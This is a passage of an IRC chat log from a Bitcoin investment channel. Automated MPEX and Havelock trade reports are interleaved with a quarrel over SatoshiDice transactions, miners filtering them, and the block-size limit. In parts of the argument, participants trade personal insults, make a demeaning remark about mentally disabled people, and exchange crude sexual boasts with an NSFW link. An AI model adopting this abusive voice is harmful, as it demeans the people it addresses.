BTC [+] Feb 04 19:04:24 [MPEX] [S.MPOE] 1555 @ 0.00069975 = 1.0881 BTC [+] Feb 04 19:04:26 [MPEX] [S.MPOE] 9040 @ 0.00069999 = 6.3279 BTC [+] Feb 04 19:07:40 [MPEX] [S.MPOE] 4321 @ 0.0006994 = 3.0221 BTC [-] Feb 04 19:07:42 [MPEX] [S.MPOE] 8829 @ 0.00069934 = 6.1745 BTC [-] Feb 04 19:12:17 [MPEX] [S.DICE] 110 @ 0.007395 = 0.8135 BTC [+] Feb 04 19:13:19 [MPEX] [S.MPOE] 4321 @ 0.00069976 = 3.0237 BTC [+] Feb 04 19:13:20 [MPEX] [S.MPOE] 5929 @ 0.00069999 = 4.1502 BTC [+] Feb 04 19:13:38 [MPEX] [S.DICE] 166 @ 0.00730792 = 1.2131 BTC [-] Feb 04 19:13:40 [MPEX] [S.DICE] 1200 @ 0.00730331 = 8.764 BTC [-] Feb 04 19:13:42 [MPEX] [S.DICE] 231 @ 0.00729809 = 1.6859 BTC [-] Feb 04 19:13:44 [MPEX] [S.DICE] 970 @ 0.00724668 = 7.0293 BTC [-] Feb 04 19:13:46 [MPEX] [S.DICE] 4259 @ 0.00724667 = 30.8636 BTC [-] Feb 04 19:13:47 [MPEX] [S.DICE] 700 @ 0.00723594 = 5.0652 BTC [-] Feb 04 19:13:48 [MPEX] [S.DICE] 1550 @ 0.00723555 = 11.2151 BTC [-] Feb 04 19:13:51 [MPEX] [S.DICE] 6421 @ 0.0072011 = 46.2383 BTC [-] Feb 04 19:13:52 [MPEX] [S.DICE] 1000 @ 0.00720101 = 7.201 BTC [-] Feb 04 19:13:54 [MPEX] [S.DICE] 150 @ 0.0072 = 1.08 BTC [-] Feb 04 19:13:54 [MPEX] [S.DICE] 1942 @ 0.00719005 = 13.9631 BTC [-] Feb 04 19:13:59 [MPEX] [S.DICE] 1681 @ 0.00715653 = 12.0301 BTC [-] Feb 04 19:14:00 [MPEX] [S.DICE] 211 @ 0.00713783 = 1.5061 BTC [-] Feb 04 19:14:01 [MPEX] [S.DICE] 1150 @ 0.0070824 = 8.1448 BTC [-] Feb 04 19:14:03 [MPEX] [S.DICE] 394 @ 0.00704102 = 2.7742 BTC [-] Feb 04 19:14:07 [MPEX] [S.DICE] 1300 @ 0.00703898 = 9.1507 BTC [-] Feb 04 19:14:13 [MPEX] [S.DICE] 200 @ 0.00702536 = 1.4051 BTC [-] Feb 04 19:15:52 [MPEX] [S.DICE] 598 @ 0.007 = 4.186 BTC [-] Feb 04 19:18:01 waaah Feb 04 19:18:11 short selling opportunities gone whoop whoop Feb 04 19:18:52 ;;ticker Feb 04 19:18:52 BTCUSD ticker | Best bid: 20.30000, Best ask: 20.30573, Bid-ask spread: 0.00573, Last trade: 20.30573, 24 hour volume: 48343.64189664, 24 hour low: 20.03100, 24 hour high: 21.05000, 24 hour vwap: 20.56918 Feb 04 19:29:37 [MPEX] [S.MPOE] 226 @ 0.00069934 = 0.1581 BTC [-] Feb 04 19:29:39 [MPEX] [S.MPOE] 4321 @ 0.00069335 = 2.996 BTC [-] Feb 04 19:29:41 [MPEX] [S.MPOE] 7453 @ 0.00069334 = 5.1675 BTC [-] Feb 04 19:33:33 s.dice minigraph now looks like a butt Feb 04 19:43:31 hi Feb 04 19:44:02 just got notification about deposit... fortunately i chacked it with bitcoind and that block got orphaned Feb 04 19:46:11 i've got a joke for you: "now that we have paid bitcoin devs, they can perhaps make such things simpler" Feb 04 19:46:53 jurov what deposit is that ? Feb 04 19:47:46 normal coinbr stuff Feb 04 19:50:29 haha, but getting notification about mpex deposits would be quite useful, too :D Feb 04 19:50:51 [MPEX] [S.MPOE] 4096 @ 0.00069405 = 2.8428 BTC [+] Feb 04 19:50:53 [MPEX] [S.MPOE] 4321 @ 0.00069454 = 3.0011 BTC [+] Feb 04 19:50:54 [MPEX] [S.MPOE] 4483 @ 0.00069455 = 3.1137 BTC [+] Feb 04 19:51:31 someday i'll give up and run electrum. for mass mpex surveillance. Feb 04 19:53:44 usagi, when they mature? when someone buys for 0.001 ? Feb 04 19:54:55 hm, perhaps you need to ask someone to explain difference between mpoe shares and bonds. Feb 04 19:55:59 bonds and thus MPBPT on bitfunder based on them do mature every month Feb 04 19:56:10 s.mpoe are normal shares that jsut pay dividends Feb 04 19:57:21 i'd think experienced investor would refer to things by proper names? Feb 04 19:57:49 ;) Feb 04 19:57:53 [MPEX] [S.MPOE] 2265 @ 0.00069334 = 1.5704 BTC [-] Feb 04 19:59:09 i see Feb 04 20:00:21 it is backed by MPOE bond , yea Feb 04 20:00:59 yes Feb 04 20:01:46 right Feb 04 20:02:10 [MPEX] [S.MPOE] 618 @ 0.00069334 = 0.4285 BTC [-] Feb 04 20:02:12 [MPEX] [S.MPOE] 4321 @ 0.00069252 = 2.9924 BTC [-] Feb 04 20:02:16 [MPEX] [S.MPOE] 11800 @ 0.00069251 = 8.1716 BTC [-] Feb 04 20:02:18 [MPEX] [S.MPOE] 2873 @ 0.00069003 = 1.9825 BTC [-] Feb 04 20:09:43 Network total 22.949 Thash/s Feb 04 20:09:44 some Trill shit right here.... https://soundcloud.com/mihkal/th-d-ip Feb 04 20:09:45 those asics... Feb 04 20:10:01 [MPEX] [S.MPOE] 7127 @ 0.00069003 = 4.9178 BTC [-] Feb 04 20:10:03 [MPEX] [S.MPOE] 10223 @ 0.00069002 = 7.0541 BTC [-] Feb 04 20:10:21 someone bot the JUNs for 8995. Not a believer. Feb 04 20:10:30 Not selling those down there. Feb 04 20:12:27 8995 still is a tripling of diff Feb 04 20:12:45 Hi Guys, what's the ticket for MPOE bond? Feb 04 20:13:03 the mpoe bond is not listed as a ticker. Feb 04 20:13:23 I see, how can I do if I want to buy? Feb 04 20:13:23 you need to email your intended deposit and demanded % then send the btc Feb 04 20:24:50 Chilca, https://bitcointalk.org/index.php?topic=64962.40 Feb 04 20:25:13 if bitcointalk worked Feb 04 20:26:07 lol Feb 04 20:27:00 [MPEX] [S.MPOE] 1650 @ 0.00069452 = 1.146 BTC [+] Feb 04 20:31:13 triple diff by june seems rather low Feb 04 20:31:43 thats the first avalon run Feb 04 20:32:37 well you can certainly pay more. Feb 04 20:33:59 [MPEX] [S.MPOE] 9777 @ 0.00069002 = 6.7463 BTC [-] Feb 04 20:34:02 [MPEX] [S.MPOE] 3923 @ 0.00069001 = 2.7069 BTC [-] Feb 04 20:35:05 is there a log of the satoshidice secrets (not the hash's of, but the secrets that are published after their use is over) Feb 04 20:36:00 not that i know of, but this would be a useful thing Feb 04 20:36:28 i think i recall someone keeping a log Feb 04 20:39:25 [MPEX] [S.DICE] 1700 @ 0.00665516 = 11.3138 BTC [-] Feb 04 20:39:27 [MPEX] [S.DICE] 11164 @ 0.007 = 78.148 BTC [+] Feb 04 20:43:40 :( Feb 04 20:45:22 [MPEX] [S.DICE] 500 @ 0.007 = 3.5 BTC [+] Feb 04 20:48:36 [MPEX] [S.DICE] 500 @ 0.007 = 3.5 BTC [+] Feb 04 21:00:11 [MPEX] [S.DICE] 400 @ 0.006667 = 2.6668 BTC [-] Feb 04 21:00:12 [MPEX] [S.DICE] 10400 @ 0.007 = 72.8 BTC [+] Feb 04 21:03:20 [HAVELOCK] [SDICE] 5 @ 0.76 = 3.8 BTC [+] Feb 04 21:07:28 [MPEX] [S.MPOE] 2671 @ 0.00069452 = 1.8551 BTC [+] Feb 04 21:07:29 [MPEX] [S.MPOE] 2029 @ 0.00069455 = 1.4092 BTC [+] Feb 04 21:07:53 Cheap S.DICE shares yay :D Feb 04 21:08:59 imo it was cheap at 0.0035 XD Feb 04 21:09:08 !ticker mpex s.bbet Feb 04 21:09:10 [MPEX:S.BBET] 1D: 0.0014 / 0.0014 / 0.0014 (300 shares, 0.42 BTC), 7D: 0.00139 / 0.00144825 / 0.00159999 (32457 shares, 47.01 BTC), 30D: 0.000337 / 0.00079944 / 0.0035 (2340020 shares, 1,870.71 BTC) Feb 04 21:15:19 [HAVELOCK] [SDICE] 60 @ 0.765 = 45.9 BTC [+] Feb 04 21:16:13 [MPEX] [S.MPOE] 1810 @ 0.00069455 = 1.2571 BTC [+] Feb 04 21:16:54 evening everyone Feb 04 21:26:47 [MPEX] [S.MPOE] 4321 @ 0.00069024 = 2.9825 BTC [-] Feb 04 21:26:49 [MPEX] [S.MPOE] 10337 @ 0.00069013 = 7.1339 BTC [-] Feb 04 21:26:51 [MPEX] [S.MPOE] 292 @ 0.00069002 = 0.2015 BTC [-] Feb 04 21:28:26 [MPEX] [S.MPOE] 3884 @ 0.00069455 = 2.6976 BTC [+] Feb 04 21:28:28 [MPEX] [S.MPOE] 4321 @ 0.00069487 = 3.0025 BTC [+] Feb 04 21:28:31 [MPEX] [S.MPOE] 4800 @ 0.00069488 = 3.3354 BTC [+] Feb 04 21:28:37 [MPEX] [S.MPOE] 919 @ 0.00069719 = 0.6407 BTC [+] Feb 04 21:39:54 [MPEX] [S.MPOE] 4200 @ 0.00069035 = 2.8995 BTC [-] Feb 04 21:41:10 [MPEX] [S.MPOE] 3818 @ 0.00069002 = 2.6345 BTC [-] Feb 04 21:41:10 [MPEX] [S.MPOE] 121 @ 0.00069035 = 0.0835 BTC [+] Feb 04 21:41:12 [MPEX] [S.MPOE] 16261 @ 0.00069001 = 11.2203 BTC [-] Feb 04 21:42:16 [BTCTC] [GSDPT] 500 @ 0.0073 = 3.65 BTC [-] Feb 04 21:43:01 [MPEX] [S.DICE] 598 @ 0.0066383 = 3.9697 BTC [-] Feb 04 21:44:51 [MPEX] [S.MPOE] 570 @ 0.00069719 = 0.3974 BTC [+] Feb 04 21:44:56 [MPEX] [S.MPOE] 1630 @ 0.00069899 = 1.1394 BTC [+] Feb 04 21:54:08 Namworld: https://bitcointalk.org/index.php?topic=141139.msg1503280#msg1503280 Feb 04 21:55:19 [MPEX] [S.MPOE] 1750 @ 0.00069001 = 1.2075 BTC [-] Feb 04 21:58:01 [MPEX] [S.MPOE] 5200 @ 0.00069001 = 3.5881 BTC [-] Feb 04 21:59:16 [MPEX] [S.MPOE] 3470 @ 0.00069899 = 2.4255 BTC [+] Feb 04 21:59:18 [MPEX] [S.MPOE] 4321 @ 0.00069998 = 3.0246 BTC [+] Feb 04 21:59:20 [MPEX] [S.MPOE] 4110 @ 0.00069998 = 2.8769 BTC [+] Feb 04 21:59:22 [MPEX] [S.MPOE] 368 @ 0.00069999 = 0.2576 BTC [+] Feb 04 22:02:42 [MPEX] [S.MPOE] 4600 @ 0.00069999 = 3.22 BTC [+] Feb 04 22:07:55 lol what would mjr_ say upon seeing this Feb 04 22:08:25 wha happened ? Feb 04 22:09:03 i thought it was mjr_'s stability bot Feb 04 22:09:25 yesterday he got higly agitated about mpoe spreads Feb 04 22:09:38 and no, it's not his bot ;D Feb 04 22:09:43 [MPEX] [S.MPOE] 4400 @ 0.0006943 = 3.0549 BTC [-] Feb 04 22:12:20 [MPEX] [S.MPOE] 2900 @ 0.0006943 = 2.0135 BTC [-] Feb 04 22:12:22 [MPEX] [S.MPOE] 33750 @ 0.00069999 = 23.6247 BTC [+] Feb 04 22:12:50 midnightmagic you won't believe this (yes you will) but gavin brought consensus to the maxblocksize issue. Feb 04 22:13:28 link? Feb 04 22:13:45 https://bitcointalk.org/index.php?topic=140233.msg1503099#msg1503099 Feb 04 22:17:52 [MPEX] [S.MPOE] 4321 @ 0.00069006 = 2.9817 BTC [-] Feb 04 22:17:53 [MPEX] [S.MPOE] 2929 @ 0.00069002 = 2.0211 BTC [-] Feb 04 22:18:13 inb4 Luke-Jr Luke-Jrs about it Feb 04 22:18:52 ya, that makes a diff. Feb 04 22:20:21 [MPEX] [S.MPOE] 1232 @ 0.00069002 = 0.8501 BTC [-] Feb 04 22:20:21 [MPEX] [S.MPOE] 2239 @ 0.00069001 = 1.5449 BTC [-] Feb 04 22:24:06 ;;ticker Feb 04 22:24:07 BTCUSD ticker | Best bid: 20.13401, Best ask: 20.21000, Bid-ask spread: 0.07599, Last trade: 20.21000, 24 hour volume: 44775.20493977, 24 hour low: 20.04250, 24 hour high: 21.05000, 24 hour vwap: 20.53126 Feb 04 22:24:17 so 20 is the new 14 basically. Feb 04 22:25:09 [MPEX] [S.MPOE] 11200 @ 0.00069002 = 7.7282 BTC [+] Feb 04 22:27:08 BitVPS delivers: https://bitcointalk.org/index.php?topic=76506.msg1503376#msg1503376 Feb 04 22:27:10 lmaooooo Feb 04 22:27:38 im kind of affraid to look Feb 04 22:28:07 send the gal. she'll know what to do Feb 04 22:29:16 um. so what's the problem with that ? Feb 04 22:29:42 mircea_popescu: Were you meaning to address me? Feb 04 22:29:43 it's next week. probably. Feb 04 22:29:52 midnightmagic yeah Feb 04 22:30:14 mircea_popescu: Which maxblocksize issue are you talking about? Feb 04 22:30:17 you've not been following the maxblocksize most recent drama ? Feb 04 22:30:39 https://bitcointalk.org/index.php?topic=140233.msg1503099#msg1503099 < Feb 04 22:30:39 i'm on the mailing list. was it there? Feb 04 22:30:44 ah thanks. Feb 04 22:32:43 [MPEX] [S.DICE] 3313 @ 0.007 = 23.191 BTC [+] Feb 04 22:32:45 [MPEX] [S.DICE] 1000 @ 0.00739499 = 7.395 BTC [+] Feb 04 22:32:46 [MPEX] [S.DICE] 8549 @ 0.007395 = 63.2199 BTC [+] Feb 04 22:39:08 [MPEX] [S.MPOE] 7700 @ 0.00069515 = 5.3527 BTC [+] Feb 04 22:39:10 [MPEX] [S.MPOE] 2400 @ 0.00069964 = 1.6791 BTC [+] Feb 04 22:41:51 [MPEX] [S.MPOE] 999 @ 0.00069964 = 0.6989 BTC [+] Feb 04 22:42:05 mircea_popescu: There an ancillary issue (for miners at least) for txn verification as well. I don't really view the max block size as an issue, since I have no trouble running multi-TB databases, so I, personally, will have no issue remaining a node even if maxblocksize increases massively Feb 04 22:42:30 I do view satoshidice as a particularly pernicious form of evil, for example. Feb 04 22:42:50 i know. Feb 04 22:43:04 it's pretty easy to exclude their transactions Feb 04 22:43:16 i'll be doing that soon ;) Feb 04 22:43:31 miner revolt against satoshidice Feb 04 22:43:35 We still have to accept blocks that other douches mine SD into.. Feb 04 22:43:45 yeah me too, btw. Feb 04 22:44:00 sokay, they make enough dough to build their own rigs, run you boys outta biz. Feb 04 22:44:10 lol Feb 04 22:44:25 The issue is that while *we* will save ourselves from mining effort, if it becomes too widely-adopted SD will modify their scheme and it'll be a kind of arms race after that Feb 04 22:44:50 if you're in the business of mining, trying to save yourself from mining effort seems a little... Feb 04 22:44:59 you know, like the whore that's trying not to get laid too much. Feb 04 22:44:59 how should they modify their scheme, midnightmagic?? Feb 04 22:45:03 find a diff line maybe. Feb 04 22:45:11 lol. We outnumber them both in terms of brains, and in overall hashrate. They couldn't afford to directly compete against the long tail. Not yet. Feb 04 22:45:28 yaya. gl. Feb 04 22:45:31 mircea_popescu, the idea is to make SD take deposits and not do everything through the block chain Feb 04 22:45:39 not gonna happen. Feb 04 22:45:42 Anduck: Stop using the blockchain as their own personal database. Feb 04 22:45:49 huh? Feb 04 22:45:54 mircea_popescu, it will be their down fall then Feb 04 22:46:05 and contrary to popular belief, the 700k btc company tells the 50k nominal /2k market value bond people what's what. Feb 04 22:46:07 Anduck: They should modify their scheme to stop using the blockchain as their own personal database. Feb 04 22:46:11 Anduck: you send to a one-time-use address to deposit, play as much as you like on the site; when you're done, you enter the withdraw address and it sends the balance back; if you don't do anything for 5-10 mins, it sends it back to where it came by default Feb 04 22:46:24 not gonna happen, you might as well forget it. Feb 04 22:46:28 welll i like the current system, Feb 04 22:46:29 mircea_popescu: If you say so. :) Feb 04 22:46:32 mircea_popescu: then SD can die Feb 04 22:46:35 think if without nerd goggless Feb 04 22:46:35 heh. Feb 04 22:46:39 mircea_popescu is too smart for the rest of us Feb 04 22:46:47 dudes, it's simple : miners that mine can stick around Feb 04 22:46:56 mircea_popescu: also, it's hardly a consensus when there's 1 person.. Feb 04 22:46:57 miners that don't mine can find a job in obama's booming economy Feb 04 22:46:57 for normal gambling man current SD kind of gambling is super Feb 04 22:46:59 either way. Feb 04 22:47:07 mircea_popescu: txn that don't DDoS can stick around. Feb 04 22:47:15 u dont evn need to go to the site to gamble Feb 04 22:47:16 but i did lol my ass off at amazingrando's sob story. Feb 04 22:47:24 here you are, a bunch of , as tghe italians say, rotinculo Feb 04 22:47:28 telling me about who can die ? Feb 04 22:47:30 mircea_popescu: By the time the block reward is < txn fees, this problem will already have been solved. Feb 04 22:47:39 go get 9k usd a month to pay for electricity and 40 hours week for free. Feb 04 22:47:43 mircea_popescu: responsible miners will continue to mine blocks without dice spam Feb 04 22:47:47 bunch of brains ? i remain unimpressed. Feb 04 22:47:57 the responsible miners will mine. the idiots will highfalootin. Feb 04 22:48:04 mircea_popescu: I wasn't aware we should be impressing you. :) Feb 04 22:48:10 mircea_popescu: Would you like to be impressed? Feb 04 22:48:13 i thought that's the point of the exercise. Feb 04 22:48:44 mircea_popescu: No, the point of the exercise was to make public comments. Feb 04 22:48:50 ah i c. Feb 04 22:49:02 well ok, how's this for public comments : all you boys together don't clear 10k btc a month. Feb 04 22:49:13 and this even if we don't pay you as much as waitresses make Feb 04 22:49:16 1.5 an hour or w/e Feb 04 22:49:22 so, i can understand envy. Feb 04 22:49:29 i can't understand envy masquerading as "responsibility". Feb 04 22:49:48 mircea_popescu: Trollfail. Feb 04 22:49:56 laters. Feb 04 22:50:27 someone be funny, i'm bored Feb 04 22:50:42 davout why are you here when you should be fighting your competition! Feb 04 22:51:09 i can't Feb 04 22:51:23 [MPEX] [S.MPOE] 8450 @ 0.00069157 = 5.8438 BTC [-] Feb 04 22:51:25 he's too legit Feb 04 22:51:36 lol Feb 04 22:51:48 he's too legit for his car... too legit... by far Feb 04 22:52:01 i sometimes feel bad hitting on mentally retarded people Feb 04 22:52:18 i never hit on mentally retarded people that mind their own business. Feb 04 22:52:26 davout: mircea_popescu's problem in this case seems to be he likes to think he's important Feb 04 22:52:59 Luke-Jr: i'll count to three in tonal and then *poof* you'll disappear Feb 04 22:53:01 no luke, you're the one that likes to think you're important. Feb 04 22:53:03 you're not. Feb 04 22:53:22 Luke-Jr: <3 Feb 04 22:53:23 davout: don't do it! Feb 04 22:53:26 :P Feb 04 22:53:58 o jesus Feb 04 22:54:04 regardless of which of you is the most important, my cock is still the biggest, measured in metric, imperial or tonal Feb 04 22:54:13 who ever heard of this bullshit even, guy does 2% of the hash, is going to establish whether the one aplication deriving actual use out of bitcoin dies or not. Feb 04 22:54:26 davout i take it you've not seen pix of mine ? Feb 04 22:54:51 mircea_popescu: i couldn't tell them apart, balls were touching Feb 04 22:54:58 i like what davout said Feb 04 22:55:14 http://trilema.com/2010/nsfw-pula-mea/ read it and weep frenchie. Feb 04 22:55:22 [MPEX] [S.MPOE] 922 @ 0.00069964 = 0.6451 BTC [+] Feb 04 22:55:24 [MPEX] [S.MPOE] 4161 @ 0.00069998 = 2.9126 BTC [+] Feb 04 22:55:25 [MPEX] [S.MPOE] 2017 @ 0.00069999 = 1.4119 BTC [+] Feb 04 22:55:30 so glad I'm at work right now Feb 04 22:55:55 well tbh it's not safe for home, either. Feb 04 22:56:12 it's in romanian, you just made me waste one trilema free article Feb 04 22:56:41 you can't read pictures either ? Feb 04 22:56:45 mirea_popescu: just because i'm poor doesn't mean i know how to read romanian Feb 04 22:56:55 ahaha good one Feb 04 22:57:18 true infact Feb 04 22:57:19 xD Feb 04 22:57:33 there are like pictures of a black rod or whatever it is Feb 04 22:57:55 you've never seen one before i take it ? Feb 04 22:58:12 mircea_popescu: well, at least thank you! i'm starting to feel slightly amused :D Feb 04 22:58:20 [HAVELOCK] [SDICE] 1 @ 0.75815152 BTC [-] Feb 04 22:58:36 it's been my go-to for internet cock competitions for years now Feb 04 22:58:43 nah, i kinda feel ok having little experience with black rods Feb 04 22:58:50 lol Feb 04 22:59:36 it's not black. it's just... pigmented. Feb 04 23:00:33 davout: heh, I didn't say I was important :P Feb 04 23:00:35 davout: I prefer to argue with logic, not "none of you other people matter" Feb 04 23:00:50 let me hear this logic. Feb 04 23:01:08 "there is one actual aplication making btc useful. we should act like we matter tho we don't and pretend like we can kill it tho we can't" Feb 04 23:01:14 the "none of you other people matter" attitude has one big advantage : you don't really need to justify yourself Feb 04 23:01:33 o, wait. his logic reminds me of this chick i fired on the 2nd date. Feb 04 23:01:44 he... left. Feb 04 23:01:50 but that only matters IMO if you have the desire to be right Feb 04 23:02:16 timely tweet from god himself https://twitter.com/TheTweetOfGod/status/298536246970552321 Feb 04 23:02:17 i couldn't care less, honestly, but the pompous miner ass is getting on my nerves. Feb 04 23:02:45 [MPEX] [S.MPOE] 11650 @ 0.00069999 = 8.1549 BTC [+] Feb 04 23:03:04 so anyone actually know how much hash elgius is doing these days ? they don't seem to have it on the main page anywhere. Feb 04 23:03:41 bitcoin attrcat people with various kinds of mental disorders, they are an advantage in making it progress, but sometimes they hinder social interaction i beliebe Feb 04 23:03:53 I AM A BELIEBER Feb 04 23:03:59 lol Feb 04 23:04:50 dude check it out! not one within the past hour! sdice is going to die omg! Feb 04 23:05:26 bieber nation Feb 04 23:07:43 justin 3:16 Feb 04 23:09:41 why, oh WHY would block size be limited? Feb 04 23:10:33 Namworld you know those 2gb files on your disk ? Feb 04 23:11:25 thats a problem of fat32 Feb 04 23:11:30 word Feb 04 23:11:34 noone uses that Feb 04 23:11:42 at least noone relevant Feb 04 23:11:44 ya well, if i finally buy an asic and start mining 1tb blocks just to be an ass Feb 04 23:11:46 lol Feb 04 23:11:52 you're all stuck buying a new hdd each day Feb 04 23:11:54 it's because everyone has a copy of the blockchain Feb 04 23:11:56 yeah, exactly Feb 04 23:12:14 mircea_popescu: SD's DDoS isn't useful at all Feb 04 23:12:21 [MPEX] [S.MPOE] 10089 @ 0.00069999 = 7.0622 BTC [+] Feb 04 23:12:24 splitting the size of blocks into smaller ones doesnt fix any problem really Feb 04 23:12:27 If the blockchain can't handle SD Feb 04 23:12:30 Luke-Jr its business model is THE ONLY USEFUL THING BITCOIN DOES AT THE MOMENT. Feb 04 23:12:37 It can't handle anything serious Feb 04 23:12:50 I don't see the problem Feb 04 23:12:51 maybe one day it'll do something else, or something more. Feb 04 23:12:56 mircea_popescu: nonsense Feb 04 23:12:59 how much has SD paid in fees atm ? Feb 04 23:13:00 but so far, the fact that people can s.dice is the only utility btc has. Feb 04 23:13:07 Namworld: not even VISA handles this kind of attack Feb 04 23:13:12 davout half of all fees ever paid or something. Feb 04 23:13:23 kakobreklaa: it solves the problem of the blockchain growing too fast, by replacing it with the problem of transaction with low transaction fees take significantly longer to process than transactions with larger transaction fees Feb 04 23:13:29 mircea_popescu: you seem to not know what useful means Feb 04 23:13:30 kakobreklaa: which is a much better problem to have Feb 04 23:13:41 Luke-Jr no, i know what useful means. that's why i'm on the money side. Feb 04 23:13:46 iz there is no iniciative for a miner not to accept 1satoshi fee TX Feb 04 23:13:46 you think you know what right means Feb 04 23:13:50 but that's always debatable. Feb 04 23:14:02 Luke-Jr: i politely beg to differ, it's a feature, not a bug, if you do not want these delicious transaction fees, don't mine the SD txes, *boom* problem solved Feb 04 23:14:21 davout he thinks this will have any other result than him being pushed out of mining. Feb 04 23:14:21 kakobreklaa: every transaction increases the risk your block is orphaned Feb 04 23:14:38 kakobreklaa: when they start bumping into the blocksize limitation, there will be -- and they will prioritize the transactions with higher transaction fees over the ones that have lower ones, since they get the transaction fees if they solve the block Feb 04 23:14:49 davout: the risk of orphaned blocks from SD is much greater than any fees they pay Feb 04 23:14:54 yeah but miners vote Feb 04 23:14:57 what the blockchain will be Feb 04 23:15:00 with hashpower Feb 04 23:15:05 you cant say it will be like so Feb 04 23:15:08 kakobreklaa that's gavin's proposed solution. Feb 04 23:15:13 Luke-Jr: why would a block be orphaned because it includes a SD tx ? Feb 04 23:15:15 and i think its pretty smart. Feb 04 23:15:18 kakobreklaa: but they have the same incentives ala transaction fees Feb 04 23:15:19 even gavin cant say it will be so Feb 04 23:15:41 davout: every transaction increases the time it takes to verify the block, which occurs before each node begins relaying it Feb 04 23:15:45 anyone can fork a more profitable bitcoind Feb 04 23:15:56 davout: SD-including blocks often take minutes to cross the network Feb 04 23:16:01 kakobreklaa ya but so far there's not much incentive. Feb 04 23:16:13 kakobreklaa: how would you fork a more profitable bitcoind? Feb 04 23:16:23 by excluding the limit Feb 04 23:16:29 Luke-Jr: so miners will have a reduced incentive to mine them. boom, solution is built-in the problem Feb 04 23:16:32 but then it wouldn't be bitcoin Feb 04 23:16:40 as long as majority does it Feb 04 23:16:41 and you would be starting where bitcoin started.. at 0 Feb 04 23:16:51 I understand that the blockchain contains all the history of each individual coins? Feb 04 23:16:51 kakobreklaa: then it wouldn't be a fork Feb 04 23:16:51 davout: exactly, that's part of why rational miners block it Feb 04 23:17:00 it would be a takeover Feb 04 23:17:01 for a bitcoind to use blockchain Feb 04 23:17:04 fork* Feb 04 23:17:06 no Feb 04 23:17:09 you can do that now Feb 04 23:17:15 Luke-Jr: so what's your point ? Feb 04 23:17:17 Namworld: not exactly Feb 04 23:17:18 davout: exactly, that's part of why rational miners block it << this is "no true scotsman" Feb 04 23:17:19 sure, but it won't work on the network Feb 04 23:17:21 idiots block it, atm. Feb 04 23:17:25 ofc it will be on the net Feb 04 23:17:35 What kind of history does it keep Luke? Feb 04 23:17:36 iz there are many nonstandard clients Feb 04 23:17:39 wtf does "no true scotsman" mean ? Feb 04 23:17:44 it's a logical fallacy. Feb 04 23:17:51 Namworld: transactions Feb 04 23:17:56 http://en.wikipedia.org/wiki/No_true_Scotsman Feb 04 23:17:56 kakobreklaa: the non-standard clients still conform to all the bitcoin network rules though Feb 04 23:17:58 davout: it's a logical fallacy that mircea_popescu doesn't understand Feb 04 23:18:01 kakobreklaa: there no non-standard mining clients that i know of Feb 04 23:18:03 iz to some degree Feb 04 23:18:08 to 100% Feb 04 23:18:11 no Feb 04 23:18:12 if they don't they won't work Feb 04 23:18:14 dude, fact of the matter is, the 99.8% miners that aren't you do mine it. Feb 04 23:18:17 you are wrong iz Feb 04 23:18:20 i'm not Feb 04 23:18:21 So it strictly tracks x.xx goes from a to b Feb 04 23:18:26 calling them irrational is exactly the sort of popmassery that you got in trouble for earlier. Feb 04 23:18:26 yes you are :) Feb 04 23:18:28 but check your facts Feb 04 23:18:29 ? Feb 04 23:18:33 mircea_popescu: wrong Feb 04 23:18:46 i'm not going to argue with you, i'll let you remain ignorant if you so desire Feb 04 23:18:50 You can't distinguish a satoshi from another? Feb 04 23:18:50 [BTCTC] [BASIC-MINING] 20 @ 0.35 = 7 BTC [+] Feb 04 23:18:55 its you who is ignorant Feb 04 23:18:57 ya, i spelled it popmassery. i mean pompassery. Feb 04 23:19:02 kakobreklaa: see my prior line Feb 04 23:19:13 yet you keep posting stuff Feb 04 23:19:35 i'll let someone else explain to you where you are wrong Feb 04 23:19:54 we just had a link not long ago Feb 04 23:19:57 s.dice did about half of all transactions to date, and paid about half of all fees paid to date. Feb 04 23:20:02 kakobreklaa iz what are you arguing about ? may i join in your argument ? i feel bored and would enjoy bitchslapping whichever one of you two is wrong Feb 04 23:20:07 if you want to empty block mine that's one thing Feb 04 23:20:07 about nonstandard client making a rand() return 4; call Feb 04 23:20:15 but what you're calling rational is nonsense. Feb 04 23:20:16 so dont give me shit iz :) Feb 04 23:20:31 kakobreklaa: it's still conforming to the bitcoin network protocol, even if it's not implemented exactly the same Feb 04 23:20:37 [BTCTC] [COGNITIVE] 1 @ 0.3099 BTC [-] Feb 04 23:20:39 [BTCTC] [COGNITIVE] 3 @ 0.3099 = 0.9297 BTC [-] Feb 04 23:20:39 Luke-JR: ok, suppose someone has 100 BTC in his address and he receives 50 "tainted" coins. He now has 150 BTC. If he then spend part of it, there's no distinction between the two? Feb 04 23:20:44 in the same way linux and windows both conform to TCP, even if they aren't implemented exactly the same Feb 04 23:20:53 and you can fingerprint differences between them Feb 04 23:20:59 and when did this chan become an unholy cross between -otc, -mining and -nonsense! Feb 04 23:21:00 mircea_popescu: spammers did more than half of all emails to date, and paid about the same in bandwidth costs! Feb 04 23:21:01 there is no spec for the bitcoin protocol, point = moot Feb 04 23:21:02 but the two systems can still communicate with each other Feb 04 23:21:25 Namworld: Bitcoin does not work with balances either. Feb 04 23:21:26 the "spec" is by code, and defined by the current bitcoin client that everyone is running Feb 04 23:21:26 Luke-Jr that's possibly the most braindamaged, broken analogy you came up with so far Feb 04 23:21:31 and you have quite the history of that. Feb 04 23:21:42 hmm Feb 04 23:21:43 iz code != spec Feb 04 23:21:48 mircea_popescu: nope, it's pretty much exactly equivalent Feb 04 23:21:57 no dude. there's good email and bad email. Feb 04 23:21:58 davout: these are rules like "block reward halving times" and such Feb 04 23:22:07 you can't just change those rules to "fork" bitcoin Feb 04 23:22:07 there's only transactions. not good, not bad, not holy or purple. Feb 04 23:22:10 bitcoin is tx agnostic. Feb 04 23:22:15 and suddenly have a new version of bitcoin that is just "better" Feb 04 23:22:26 mircea_popescu: no, it isn't. Feb 04 23:22:32 ya well that's the problem. Feb 04 23:22:34 these rules include the block size limitation Feb 04 23:22:39 iz: of course you can, with a mining majority Feb 04 23:22:48 mircea_popescu knows all Feb 04 23:22:49 we'll never agree, and your choices are either submit or i'll kill you. Feb 04 23:22:52 so... we can lay it to rest. Feb 04 23:22:55 iz: just because there are rules everybody agrees upon doesn't mean there is a proper spec, this has been discussed like a million times, and it is why i wholeheartedly welcome the cbitcoin initiative Feb 04 23:22:56 no point in arguing Feb 04 23:23:00 dub: it's not the miners that matter, it's the bitcoin CLIENTS Feb 04 23:23:00 exactly. Feb 04 23:23:07 mircea_popescu: Bitcoin users have agreed to store FINANCIAL TRANSFERS in the blockchain. Not DNS. Not game activity. Not notifications. Feb 04 23:23:29 mircea_popescu: anything other than a direct 